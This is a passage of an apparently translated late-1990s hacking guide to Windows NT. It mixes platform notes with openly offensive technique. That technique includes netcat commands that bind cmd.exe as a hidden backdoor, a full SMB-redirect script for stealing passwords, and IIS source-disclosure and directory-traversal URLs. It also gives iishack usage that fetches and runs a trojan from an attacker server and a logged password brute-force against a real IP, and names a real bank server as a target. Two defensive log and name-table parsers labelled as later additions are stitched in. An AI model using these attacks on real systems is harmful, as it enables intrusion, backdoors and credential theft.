 In Windows 98 the concept of users and groups is almost entirely absent, to
 say nothing of file access rights. Windows NT is a multiuser environment
 and has quite a decent system for protecting one user from another. File
 access is governed by the so-called ACL - access control list, which is
 taken from VMS. Even so, the administrator of NT is less protected than on
 Unix. More on that below.

     1.5) GUI

 The GUI of Windows NT 4.0 is absolutely the same as in Windows 95. After
 installing IE4 the result is an exact copy of Windows 98. There is also
 command-line support, and the shell has more functions than the standard
 command.com, but even so it is not of much use. There is simply no place
 for a command line in the WinNT ideology - for example there is no program
 with which to add a user or view the processes from the command line. This
 shortcoming is compensated for by additional (non-Microsoft) programs.

     1.6) Support for DOS and Win16 applications

 Not all DOS applications run, and those that run do not always run
 properly. There are problems with some programs that access the hardware
 directly and with programs that use a 32-bit extender. Also, some programs
 cannot cope with the synchronization - NT's timer does not work correctly
 with DOS programs. So far I have not managed to get my sound card working
 with DOS games. Besides, it is slow - when running a plain EDIT.COM and
 scrolling in a DOS box, the CPU load is 50% (for comparison - Winamp takes
 only 11%).

 Win16 is supported considerably better, although it is still slower than
 pure Windows 3.1.

     1.7) Games

 Eh... this is its sore spot - WinNT supports only DirectX 3, which keeps it
 from working with the newer games. For example Worms 2 works perfectly
 under NT, but Worms 3 does not. Windows NT 4.0 is not suitable for game
 clubs, but Windows 2000 will have full support for everything that Windows
 98 has.

     2) Support for UNIX applications and porting

 Because UNIX is the better operating system, WinNT users need some way of
 being able to use UNIX applications. (I have never heard of a UNIX admin
 using something ported from NT - what better testimony to the superiority
 of UNIX.)

 The architecture of Windows NT is built on layers, which brings a certain
 flexibility. The NT kernel provides functions for access to the hardware
 and takes care of processes and threads, but the high-level functions are
 not carried out there. When designing NT the designers took into account
 the need to run programs for different operating systems on NT and
 separated the kernel from what is above it. In Windows NT there are 3
 so-called 'environmental subsystems', which act as intermediaries between
 the programs and the kernel. The Win32 subsystem provides programs with the
 functions of the Win32 API and then translates them into system calls of
 the kernel. The OS/2 subsystem allows OS/2 programs to run under NT by
 translating the functions of the OS/2 API to the NT kernel. Only 16-bit
 OS/2 applications are supported, and only for OS/2 version 1.2. There is
 also a POSIX subsystem, which allows UNIX applications to be run under NT.
 For this they only need to be recompiled as Windows POSIX programs.
 Unfortunately the standard POSIX subsystem supports only the POSIX 1003.1
 standard from 1990, which makes writing anything more than 'Hello world'
 programs almost impossible.

 It really is a pity that the idea of a single portable kernel that runs on
 x86, Alpha, MIPS and PowerPC, with different 'environmental subsystems' on
 top of it through which programs for different operating systems are run,
 did not manage to develop. Microsoft (as usual) neglected the original
 design, ceasing to develop the other subsystems in favour of Win32. In
 Windows NT 4.0 the GDI and USER modules of the Win32 subsystem were shoved
 directly into the kernel, destroying the idea of many mutually independent
 subsystems.

 Besides the standard POSIX support in NT, there are several more ways of
 using UNIX programs. OpenNT (www.opennt.com) is a replacement for the
 standard POSIX subsystem that supports a considerably more complete set of
 standard functions. This allows normal UNIX applications to be recompiled
 with almost no problems.

 The last way is the most convenient: the Cygwin product from Cygnus
 (www.cygnus.org) (the maintainers of gcc). This is gcc for win32, which
 comes with a full set of header and lib files. After the UNIX program is
 compiled with gcc for Windows, the result is a normal Windows .exe that
 uses one DLL (cygwin.dll), which translates the UNIX system calls into
 calls to the Win32 API. Along with gcc, the package includes ported bash,
 grep, ls and many other standard UNIX utilities. The Windows versions of
 NAT, John The Ripper, Emacs and many others have been compiled with the
 help of Cygwin.

     3) Standard security system

 The Windows NT security model is built on the classic UNIX and VMS models,
 with some additions. Every user has their own account and belongs to one or
 more user groups. Unlike UNIX, access restrictions apply not at the file
 level but at the object level. In Windows NT an object is any resource, for
 example a file, memory, a process, a device. Every object has a so-called
 Access Control List (ACL), which is a list of access rights. Here the NT
 designers took as their model not UNIX (which has only 3 kinds of rights:
 for owner, group and others) but the VMS operating system. With it, an
 unlimited number of rights can be set for different groups. For example,
 the following rights can be set on one file:

     Administrators - Full Control
     Office Users - Change
     Power Users - Change
     Guests - Read
     Tech Support - Full Control

 The access modes depend on the type of resource. There are 4 main kinds: No
 Access, Read, Change and Full Access. For files, additional kinds of access
 can be set: the rights Read, Write, Execute, Delete and Take Ownership can
 be switched on or off individually.

 This system of access rights is definitely more flexible than the standard
 one (in the UNIX world). But although it lets the administrator configure
 quite specific kinds of access, it also has one big drawback: beginner
 administrators often fail to set up the ACLs on various important files
 correctly, and this leads to grave (for them) consequences. As one example
 I will give the problems of Lotus Notes, which, when its ACLs are
 configured incorrectly, allows remote administration of the server without
 any authentication whatsoever.

     4) TCP/IP Networking & Security

 Windows NT has good TCP/IP support, although the more interesting things
 require programs from other vendors. The commands ping, traceroute, telnet,
 ftp, arp, route and nslookup are included as standard, but some of them
 (especially telnet) are a bit crippled.

 IP routing is possible, and there is some minimal firewall support. You can
 choose which TCP ports, UDP ports and IP protocols are passed through the
 machine and which are not.

 Windows NT ships with the so-called Simple TCP Services. They are disabled
 by default, but once started, echo, discard, chargen and quote of the day
 appear. Unfortunately there is no way to start only some of them, for
 example only echo and chargen. You have to start either everything or
 nothing.

 For more advanced TCP networking you need additional programs. There is a
 telnet daemon for NT that starts a standard DOS shell on connect. Although
 the idea is good, it is of little use: Windows NT practically cannot be
 used or administered from the command line.

 There is a port of TCPDump for Windows (NT and 95) that works quite
 decently. Its source is distributed free.

 There is IP Masquerading for NT. It is called NAT32 and its address is
 www.nat32.com. From there you can download an evaluation version, whose
 only limitation is that it runs for no more than one hour (after that hour
 you have to close the program and start it again for more). The program is
 very good and is configured through something like a command line, much
 like a unix one.

 It has never been clear to me why so many Internet clubs use various crappy
 proxy software (such as WinGate or WinProxy), which is hellishly buggy and
 full of exploits, when IP Masquerading exists even for Windows. But that is
 their problem. A quick lesson on abusing such proxy software: the various
 proxies often accept connections from anywhere without restriction. For
 example, you can telnet to wingate.host.com and type at the prompt:

     WinGate>some.host.com 23

 and the proxy will open a telnet to some.host.com for you. Bonus: the proxy
 usually has no logs :-)

 One interesting program is Netcat. It allows connecting and transferring
 raw data on all ports. Additional functions are setting a source route,
 port scanning, a hex dump of the traffic, setting the source port, and UDP
 mode. Perhaps the most useful is the ability to redirect input and output,
 which greatly eases testing network protocols, pulling http headers and so
 on. It can also listen on a given port and start a program on connect,
 redirecting its input and output through the TCP connection.

 Netcat is very useful for installing a backdoor that starts the NT command
 prompt when someone connects to it.

 nc -L -p 23 -t -d -e cmd.exe    Listens on port 23 and starts a shell on connect.

 Windows NT allows any user to bind any port. This means that even if you
 are not an administrator, you can start netcat listening on port 53 and get
 through the firewall.

 You can also bind a port that is already bound by specifying the exact IP
 address of the machine (or of one of its interfaces). This is an
 interesting Denial Of Service.

 nc -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx

 where xxx.xxx.xxx.xxx is the IP address of the NT box, lets you connect to
 port 139 and get a shell. It also blocks the NetBIOS protocol, through
 which file & printer sharing is implemented. If you hide Netcat well enough
 and make sure it starts automatically, the administrator will struggle for
 quite a while to work out why file sharing does not work.

 This problem (binding privileged ports that are already bound by another
 program) allows one more interesting exploit. It is a perl script that
 redirects all SMB traffic (file sharing, printer sharing, authentication)
 to another server. From there you can forge the authentication, steal
 passwords, etc.

 -- CUT: smb-redir.pl -------------------------------------------------------

 #!/usr/bin/perl
 # This script demonstrates a major security problem with
 # Windows NT4. It is based on an earlier script (paul.pl) that
 # demonstrated a problem with a protocol change that Microsoft
 # proposed. The change in this script takes advantage of a security
 # hole pointed out by L0pht (http://www.l0pht.com/).

 # What this script does is allow any unprivileged user on a NT Server
 # to redirect the local SMB services to any other SMB server which they
 # have an IP address for. This allows the user to redirect file,
 # printer and authentication services to another server. This has
 # enormous consequences for security.

 # This script was written by Andrew Tridgell and is being sent to
 # the CIFS discussion list so that CIFS developers become aware
 # of this problem. It should be noted that the L0pht announcement
 # (which predates this script) already provided an example command
 # using netcat to achieve the same thing so this script does
 # not actually offer malicious hackers anything more than what has
 # already been widely distributed. I wrote this example so that
 # the consequences would become clear to the people who are
 # in a position to do something about fixing the problem.

 # USAGE:
 # To use this script install perl5 then run the command
 #        perl redirect.pl <localip> <remoteip>
 # for example
 #        perl redirect.pl 192.168.2.13 192.168.2.10
 # this would redirect any SMB connections made to the local
 # server (whose IP address is 192.168.2.13) to the remote
 # server 192.168.2.10. Any browsing, file access, authentication
 # requests or printing done to the local server by SMB clients
 # will be redirected to the remote server.

 # WORKAROUND:
 # There is no immediate fix to this security problem yet available. A
 #  workaround is to disable local login access to non-trusted users.
 # This can be achieved using the "User Manager For Domains". At many
 # sites this will be an acceptable solution because NT servers are
 # often used only for remote file and printer services and do not
 # really need to offer the ability for users to run arbitrary programs

 # FIX:
 # A proper fix will require a patch from Microsoft. Hopefully they will
 # either implement privileged ports or they will get the socket
 # options correct on all their servers so such bind() tricks are
 # not possible.

 use IO::Socket;
 use IO::Select;

 if ($#ARGV != 1) {
   print "Usage: redirect.pl <localip> <remoteip>\n";
   exit 0;
 }

 my $local = $ARGV[0];
 my $target = $ARGV[1];

 my $smbport = "139";
 my $Msg;

 # this is a *SMBSERVER netbios name
 my $netbname = "CKFDENECFDEFFCFGEFFCCACACACACACA";

 print "setting up redirection from $local to $target ...\n";

 # Create a local socket
 $sock1 = new IO::Socket::INET(LocalAddr=>$local,LocalPort=>$smbport,
                               Proto=>'tcp',Listen=>5,Reuse=>1);

 while (1) {
   print "listening on $local\n";

   # Accept a connection
   $IS = $sock1->accept() || die;

   # Open a socket to the remote host
   $OS = new IO::Socket::INET(PeerAddr=>$target,PeerPort=>$smbport,
                              Proto=>'tcp') || die;

   print "connected to $target\n";

   # Create a read set for select()
   $rs = new IO::Select();
   $rs->add($IS,$OS);

   $first = 1;
   $finished = 0;

   while(! $finished) {
     ($r_ready) = IO::Select->select($rs,undef,undef,undef);

     foreach $i (@$r_ready) {
       $o = $OS if $i == $IS;
       $o = $IS if $i == $OS;
       recv($i,$Msg,8192,0);

       if (! length $Msg) {
         $finished = 1;
         break;
       }

       if ($first && substr($Msg,0,1) eq "\x81") {
         print "replacing called name\n";
         $msg2 = join('',substr($Msg,0,5),$netbname,
                                          substr($Msg,37,length($Msg)-37));
         send($o,$msg2,0);
         $first = 0;
       }
       else {
         if ($i == $OS) { $Msg =~ s/Paul/Oops/mg;}
         send($o,$Msg,0);
       }
     }
   }

 # loop back to the top again
 }

 -- CUT: smb-redir.pl -------------------------------------------------------

     5) IIS

 IIS is an http and ftp server installed as standard with Windows NT. On the
 whole it has some interesting features, but unfortunately (or fortunately)
 it is full of security problems. (Almost) everything needed to turn IIS
 into a secure server can be found at:

 http://www.microsoft.com/security/products/iis/CheckList.asp

 Once you see how many things have to be done (and therefore are not secure
 by default), you will understand why IIS loses to Apache.

     5.1) IIS 3.0

     5.1.1) Displaying the source of an .asp script

 IIS supports so-called Active Server Pages, with the extension .asp, which
 are server-side scripts written in VBScript. IIS has numerous bugs that let
 you see the source of a script. From the source you can then see absolute
 paths to the documents, names of files with passwords and so on.

 Adding a dot after the script name shows its source:

 http://www.victim.com/script.asp.

 These URLs work even on servers that have the patch for the dot (%2e is the
 hex code of the ASCII character "."):

 http://www.someserver.com/default%2easp
 http://www.someserver.com/default%2e%41sp

 shtml.dll is an IIS component that serves files with Server-Side Includes
 (usually with the extension .shtml). It can be made to show the source of
 an ASP file:

 http://www.someserver.com/shtml.dll?default.asp

 An interesting feature of NTFS (the NT file system) is that it supports
 different kinds of streams associated with each file. They are specified by
 appending ::$ and the stream name after the file name when creating or
 opening it. This allows one and the same file to have several different
 contents. For example, we could have a program that stores information in a
 file, using the stream $ENG for English and $BG for Bulgarian. If we then
 open the file in Notepad as filename.txt::$ENG we open the English version,
 and with filename.txt::$BG we get the Bulgarian one. The default stream
 holding the file's data is called $DATA. This means that filename.txt is
 equivalent to filename.txt::$DATA. When such a URL is passed to the server,
 IIS shows the source of the asp file without executing it.

 http://www.someserver.com/default.asp::$DATA

     5.1.2) Index Server

 Another interesting way of pulling information about an NT server through
 IIS is Index Server, which is installed in the /samples directory of IIS
 3.0. Administrators often have problems configuring it, and this leads to
 things being found that should not be found. The URL for access to Index
 Server is http://www.someserver.com/samples/search/queryhit.htm. If you get
 a message about a nonexistent page, press the "Search This Site" button,
 which will also send you to Index Server. Then use the search string
 #filename=*.txt. This will find all .txt files that Index Server has
 indexed. Bear in mind that Index Server shows only the files you have
 access to, so if a file is shown you can be sure that you can read it. If
 Index Server is misconfigured, you can search for #filename=*._ to find the
 repair copy of the SAM database (from it you can extract the passwords of
 the users and the administrator).

     5.2) IIS 4.0

     5.2.1) Displaying the server's real IP

 The problems in IIS 4.0 are numerous too. One recently published bug is
 that the headers returned by the server always show its real IP. This can
 be a problem if the server is behind a proxy or firewall that _should_ be
 hiding its IP. It is nothing serious, but it is sometimes useful.

 $ telnet www.victim.com 80
 Trying xxx.xxx.xxx.xxx
 Connected to www.victim.com
 Escape character is '^]'.
 GET / HTTP/1.0

 HTTP/1.1 200 OK
 Server: Microsoft-IIS/4.0
 Content-Location: http://192.168.10.15/index.html
 ...

 The Content-Location header contains the server's IP.

     5.2.2) Source of .asp scripts

 Another bug that lets you see the source of .asp files is again in the
 sample scripts installed with IIS by default. The showcode.asp script is
 used to show the source of the sample files in the /msadc directory. Its
 protection consists of checking whether the target file is located in that
 directory. But the problem is that it does not check for ../

 http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=
                                         /msadc/Samples/SELECTOR/showcode.asp

 This is a normal URL demonstrating what the showcode.asp script does. The
 following URL uses the two-dots trick to climb out to the root directory of
 the server and show the contents of the boot.ini file (the configuration
 file for booting Windows):

 http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=
                                       /msadc/Samples/../../../../../boot.ini
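
 The request forms from 5.1.1 and 5.2.2, turned into a check a defender can
 run over web server logs. This is an added example, not code from the
 original article; the rule names, the log line layout and the sample lines
 (constructed, with documentation addresses) are assumptions, and the
 repeated percent-decoding goes slightly beyond the article to cover double
 encoding.

```python
import re
from urllib.parse import parse_qsl, unquote


def _decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double encoding such as %252e is unmasked too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return the sorted names of the rules a request target (path?query) matches."""
    raw_path, _, raw_query = target.partition("?")
    raw_last = raw_path.rsplit("/", 1)[-1].lower()
    last = _decode_fully(raw_path).rsplit("/", 1)[-1].lower()
    findings = set()

    # "script.asp." : one or more dots appended after the extension
    if re.search(r"\.asp\.+$", last):
        findings.add("trailing-dot")
    # "default%2easp", "default%2e%41sp": the name decodes to *.asp although
    # the bytes on the wire do not end in a literal ".asp"
    if last.endswith(".asp") and not raw_last.endswith(".asp"):
        findings.add("encoded-extension")
    # "default.asp::$DATA": a stream name appended to the file name
    if "::$" in last:
        findings.add("ntfs-stream")
    # "shtml.dll?default.asp": the SSI component asked to serve an .asp file
    if last == "shtml.dll" and re.search(r"\.asp\b", _decode_fully(raw_query).lower()):
        findings.add("shtml-dll-source")
    # showcode.asp?source=...: any ".." segment leaves the sample directory
    if last == "showcode.asp":
        for key, value in parse_qsl(raw_query, keep_blank_values=True):
            segments = re.split(r"[/\\]", _decode_fully(value))
            if key.lower() == "source" and ".." in segments:
                findings.add("showcode-traversal")
    return sorted(findings)


def scan(log_lines):
    """Yield (client, target, rules) for every log line that matches a rule.

    Assumed layout (hypothetical, not an IIS format): client method target status
    """
    hits = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        rules = classify_request(fields[2])
        if rules:
            hits.append((fields[0], fields[2], rules))
    return hits


# Constructed sample lines; 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    "192.0.2.10 GET /default.asp 200",
    "192.0.2.10 GET /my%20page.asp 200",
    "198.51.100.7 GET /script.asp. 200",
    "198.51.100.7 GET /default%2e%41sp 200",
    "198.51.100.7 GET /default.asp::$DATA 200",
    "198.51.100.7 GET /shtml.dll?default.asp 200",
    "192.0.2.10 GET /msadc/Samples/SELECTOR/showcode.asp"
    "?source=/msadc/Samples/SELECTOR/showcode.asp 200",
    "198.51.100.7 GET /msadc/Samples/SELECTOR/showcode.asp"
    "?source=/msadc/Samples/../../../../../boot.ini 200",
]

if __name__ == "__main__":
    for client, target, rules in scan(SAMPLE_LOG):
        print(client, ",".join(rules), target)
```

 The ordinary requests (including a file name with an encoded space) pass
 unflagged; only the five forms described in the article are reported.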

     5.2.3) Remote password brute-force

 With the help of IIS, a hacker can brute-force passwords on remote servers.
 In a default installation, http://www.victim.com/iisadmpwd contains .htr
 scripts that let a user change their password over the web. The files in
 the directory are the following:

 achg.htr
 aexp.htr
 aexp2.htr
 aexp2b.htr
 aexp3.htr
 aexp4.htr
 aexp4b.htr
 anot.htr
 anot3.htr

 All of them allow changing the password, with a URL of the form:

 http://www.victim.com/iisadmpwd/achg.htr

 The current password has to be entered, and if it is wrong the script
 returns an error.

 A script that brute-forces the password of a given user can easily be
 written. The username can be obtained in many ways: through NetBIOS, the
 VRFY command of SMTP, and other ways.

 If instead of a username you enter IPADDRESS\USERNAME (separated by a
 backslash), the web server will connect to the machine with that IPADDRESS
 on port 139 and from there try to change the password on the
 _remote_machine_. This can be used for remote brute-force or for getting
 through firewalls.

     5.2.4) Absolute path to the virtual directories

 If the server is configured to support perl through perl.exe, this can be
 used to find the absolute path to the web directory.

 http://www.victim.com/scripts/no-such-file.pl

 returns an error like:

 CGI Error
 The specified CGI application misbehaved by not returning a complete set of
 HTTP headers. The headers it did return are:
 Can't open perl script "C:\InetPub\scripts\no-such-file.pl": No such file or
 directory

 This means that the directory in which IIS is installed is C:\InetPub

     5.2.5) Administering the server over the web

 IIS gives administrators a means of remotely administering NT servers over
 the web. This is done through the URL http://www.victim.com/iisadmin, which
 allows various administrative tasks to be performed.

 If it is misconfigured, it is possible to get anonymous access to this
 directory, which is bad for security :-)

     5.2.6) Remote IIS buffer overflow

 Here we come to the most interesting part: remote buffer overflows. A
 buffer overflow was recently discovered that exists in SP3, SP4 and SP5 and
 allows external code to be executed on the server. The code runs as a
 system process, which gives it administrator rights. This buffer overflow
 is in the ISAPI filter for .htr files. When a GET request for an .htr file
 with a very long name is sent, the buffer overflows and the code is
 executed. There is nothing complicated in the exploit itself. eEye (the
 authors of the exploit) wrote the program iishack.asm, which exploits this
 buffer overflow. The syntax is as follows:

 iishack www.victim.com 80 www.myserver.com/trojan.exe

 www.victim.com is the server being exploited, 80 is the port the web server
 runs on, and www.myserver.com/trojan.exe is the URL of the trojan that is
 to be executed. After the server is overflowed, our code downloads
 trojan.exe from the internet and runs it. Usually ncx.exe or ncx99.exe is
 used. These are modified versions of netcat that listen on port 80 or 99
 and start a shell (cmd.exe) on connect. It is better to use ncx99.exe,
 because otherwise there are problems with the dying IIS server (which also
 listens on port 80). ncx.exe is best used only if there is a firewall
 blocking port 99.

     6) CIFS

 CIFS stands for Common Internet File System. It is a standard for remote
 access to files and printers, based on the standard of Microsoft networks
 (also encountered under the names SMB and NetBIOS). There are many ways of
 getting into an NT server through CIFS.

     6.1) nbtstat

 Every machine that supports CIFS has its own name, assigned by the
 administrator. There are various mechanisms for maintaining these names on
 the LAN (broadcast, WINS servers), but most often machines receive status
 queries on port 137 UDP and answer them, giving their name.

 This is done with the command:

 nbtstat -A www.bnb.bg

    Name               Type         Status
 ---------------------------------------------
 WEBSRV         <00>  UNIQUE      Registered
 BNBANK.ORG     <00>  GROUP       Registered
 WEBSRV         <03>  UNIQUE      Registered
 WEBSRV         <20>  UNIQUE      Registered
 BNBANK.ORG     <1E>  GROUP       Registered
 BNBANK.ORG     <1D>  UNIQUE      Registered
 ..__MSBROWSE__.<01>  GROUP       Registered

 MAC Address = 00-04-AC-86-5C-FB

 The first column holds the machine's names, with the type of the name in
 brackets. There are two kinds of names: UNIQUE and GROUP. UNIQUE means that
 the name belongs to the machine alone, while GROUP is the name of a group
 the machine belongs to. The types in brackets give us a lot of information
 about the server. Here is what the main ones mean:

 0x00    the name of the machine and of the workgroup/domain. For example,
         from the results above for www.bnb.bg we deduce that the machine
         name is WEBSRV and the group/domain is BNBANK.ORG
 0x01    if a name of this type exists, the server is the master browser for
         its local network. It collects information about its neighbouring
         machines (for example their IP addresses). This information can be
         pulled.
 0x03    messaging/alerter service, usually with the same name as the
         machine name. If there are two names of this type, the second is
         the name of a user who has logged on to the server.
 0x20    this is the "server service" name, under which the machine provides
         access to its file system and printer. If the nbtstat result
         contains no name of type 0x20, the server is not configured to
         share any resources.
 0x1B    a server with such a name is the master browser of the domain
 0x1C    the server belongs to the group of domain controllers

 There are many more name types. Here is a fuller list:

 Name            Number          Type            Usage
 =========================================================================
 <computername>  00              U               Workstation Service
 <computername>  01              U               Messenger Service
 <\\_MSBROWSE_>  01              G               Master Browser
 <computername>  03              U               Messenger Service
 <computername>  06              U               RAS Server Service
 <computername>  1F              U               NetDDE Service
 <computername>  20              U               File Server Service
 <computername>  21              U               RAS Client Service
 <computername>  22              U               Exchange Interchange
 <computername>  23              U               Exchange Store
 <computername>  24              U               Exchange Directory
 <computername>  30              U               Modem Sharing Server Service
 <computername>  31              U               Modem Sharing Client Service
 <computername>  43              U               SMS Client Remote Control
 <computername>  44              U               SMS Admin Remote ControlTool
 <computername>  45              U               SMS Client Remote Chat
 <computername>  46              U               SMS Client Remote Transfer
 <computername>  4C              U               DEC Pathworks TCPIP Service
 <computername>  52              U               DEC Pathworks TCPIP Service
 <computername>  87              U               Exchange MTA
 <computername>  6A              U               Exchange IMC
 <computername>  BE              U               Network Monitor Agent
 <computername>  BF              U               Network Monitor Apps
 <username>      03              U               Messenger Service
 <domain>        00              G               Domain Name
 <domain>        1B              U               Domain Master Browser
 <domain>        1C              G               Domain Controllers
 <domain>        1D              U               Master Browser
 <domain>        1E              G               Browser Service Elections
 <INet~Services> 1C              G               Internet Information Server
 <IS~Computer_name> 00           U               Internet Information Server
 <computername>  2B              U               Lotus Notes Server
 IRISMULTICAST   2F              G               Lotus Notes
 IRISNAMESERVER  33              G               Lotus Notes
 Forte_$ND800ZA  20              U               DCA Irmalan Gateway Service

 Often the presence or absence of a name can be tied to the presence or
 absence of particular software or a particular server configuration. For
 example, all NT machines with IIS have these two names:

 <INet~Services> 1C              G               Internet Information Server
 <IS~Computer_name> 00           U               Internet Information Server

 The server at www.bnb.bg does not have these names, which suggests that it
 has no IIS either (this is true, it runs the Lotus Domino web server).

 Here is an example of gathering information about a server through nbtstat.
 What can we learn from these results?

 Name               Type         Status
 -------------------------------------------
 NSZGATE        <03>  UNIQUE
 INet~Services  <1C>  GROUP    <- The server has IIS
 IS~NSZGATE.....<00>  UNIQUE   <- The server has IIS
 NSZGATE        <00>  UNIQUE   <- The computer name is NSZGATE
 NSZ_DOMAIN     <00>  GROUP    <- It belongs to a domain named NSZ_DOMAIN
 NSZGATE        <20>  UNIQUE   <- The server has resource sharing
 NSZGATE        <6A>  UNIQUE   <- The server has Exchange
 NSZGATE        <87>  UNIQUE   <- The server has Exchange
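
 A parser for the name tables above, for auditing what your own hosts
 advertise on UDP 137. This is an added example, not code from the original
 article; the function names and summary keys are assumptions, the suffix
 meanings come from the tables in this section, and the two sample tables
 are the ones printed above with the annotations dropped.

```python
import re

# One row of an nbtstat name table: NAME <hex suffix> UNIQUE|GROUP
ROW = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\b")

# Suffixes that the article's table ties to a product.
SOFTWARE_BY_SUFFIX = {"6A": "Exchange", "87": "Exchange", "2B": "Lotus Notes"}


def parse_name_table(text):
    """Return (name, suffix, kind) tuples; header and MAC lines are skipped."""
    rows = []
    for line in text.splitlines():
        match = ROW.match(line)
        if match:
            rows.append((match.group(1), match.group(2).upper(), match.group(3)))
    return rows


def summarize(text):
    """Interpret a name table the way section 6.1 does by hand."""
    computer, domain, sharing = None, None, False
    software, roles, messenger = set(), set(), []
    for name, suffix, kind in parse_name_table(text):
        if suffix == "00" and kind == "UNIQUE":
            if name.startswith("IS~"):          # <IS~Computer_name> 00 U
                software.add("IIS")
            else:
                computer = name
        elif suffix == "00" and kind == "GROUP":
            domain = name
        elif suffix == "1C" and kind == "GROUP":
            if name == "INet~Services":
                software.add("IIS")
            else:
                roles.add("domain controller")
        elif suffix == "1B":
            roles.add("domain master browser")
        elif suffix == "1D" or (suffix == "01" and "__MSBROWSE__" in name):
            roles.add("master browser")
        elif suffix == "20":
            sharing = True
        elif suffix == "03":
            messenger.append(name)
        elif suffix in SOFTWARE_BY_SUFFIX:
            software.add(SOFTWARE_BY_SUFFIX[suffix])
    # A <03> name other than the computer name is a logged-on user.
    users = [name for name in messenger if name != computer]
    return {"computer": computer, "domain": domain, "sharing": sharing,
            "software": sorted(software), "roles": sorted(roles), "users": users}


WEBSRV_TABLE = """
   Name               Type         Status
---------------------------------------------
WEBSRV         <00>  UNIQUE      Registered
BNBANK.ORG     <00>  GROUP       Registered
WEBSRV         <03>  UNIQUE      Registered
WEBSRV         <20>  UNIQUE      Registered
BNBANK.ORG     <1E>  GROUP       Registered
BNBANK.ORG     <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered
"""

NSZGATE_TABLE = """
NSZGATE        <03>  UNIQUE
INet~Services  <1C>  GROUP
IS~NSZGATE.....<00>  UNIQUE
NSZGATE        <00>  UNIQUE
NSZ_DOMAIN     <00>  GROUP
NSZGATE        <20>  UNIQUE
NSZGATE        <6A>  UNIQUE
NSZGATE        <87>  UNIQUE
"""

if __name__ == "__main__":
    for table in (WEBSRV_TABLE, NSZGATE_TABLE):
        print(summarize(table))
```

 A host that shows software, roles or user names it is not meant to expose
 should have NetBIOS name service filtered at the perimeter.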

     6.1) Port 139 & resource sharing

 After gathering information about the server through UDP port 137, it is
 time to connect to port 139. This is the port for commands and data of the
 CIFS protocol. To access the server's shared resources you can use the
 standard NET command in Windows.

 c:\work>net view \\192.168.0.42
 Shared resources at \\192.168.0.42

 Share name   Type         Used as  Comment
 ----------------------------------------------------
 C            Disk                  WinNT
 CDROM        Disk
 D            Disk                  Development
 E            Disk                  Dos
 F            Disk                  Temp
 G            Disk                  Games
 I            Disk                  Win98
 IBM40375     Print                 IBM 4037 5E
 The command completed successfully.

 These are the server's shares. There are several shared hard disks, a cdrom
 and a printer. In this case the shares are named after the drives, but the
 names can be whatever the administrator wants.

 If any of these shares have no password, they can be mounted with the NET
 USE command. The following command mounts the C share as x: in the file
 system.

 c:\work>net use x: \\192.168.0.42\C

 If you know a name and password for the share, you can supply them like this:

 c:\work>net use x: \\192.168.0.42\C password /USER:username

 After a successful mount, you can type

 c:\work>x:
 x:\>dir

 and you now have access to the remote disk.

 To automate operations on shared resources, the program NAT is used.
 Besides finding shares without a password, it can also be used to
 brute-force a username and password for a share.

 c:\work>nat -o scan.log 212.116.129.124

[*]--- Checking host: 212.116.129.124
[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Thu Jul 13 07:28:32 1999
[*]--- Timezone is UTC+1.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `' Password: `GUEST'
[*]--- Attempting to connect with Username: `' Password: `ROOT'
[*]--- Attempting to connect with Username: `' Password: `ADMIN'
[*]--- Attempting to connect with Username: `' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `' Password: `TEMP'
[*]--- Attempting to connect with Username: `' Password: `SHARE'
[*]--- Attempting to connect with Username: `' Password: `WRITE'
[*]--- Attempting to connect with Username: `' Password: `FULL'
[*]--- Attempting to connect with Username: `' Password: `BOTH'
[*]--- Attempting to connect with Username: `' Password: `READ'
[*]--- Attempting to connect with Username: `' Password: `FILES'
[*]--- Attempting to connect with Username: `' Password: `DEMO'
[*]--- Attempting to connect with Username: `' Password: `TEST'
[*]--- Attempting to connect with Username: `' Password: `ACCESS'
[*]--- Attempting to connect with Username: `' Password: `USER'
[*]--- Attempting to connect with Username: `' Password: `BACKUP'
[*]--- Attempting to connect with Username: `' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `' Password: `SERVER'
[*]--- Attempting to connect with Username: `' Password: `LOCAL'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `GUEST'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ROOT'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMIN'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `TEMP'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `SHARE'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `WRITE'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `FULL'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `BOTH'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `READ'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `FILES'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `DEMO'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `TEST'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ACCESS'
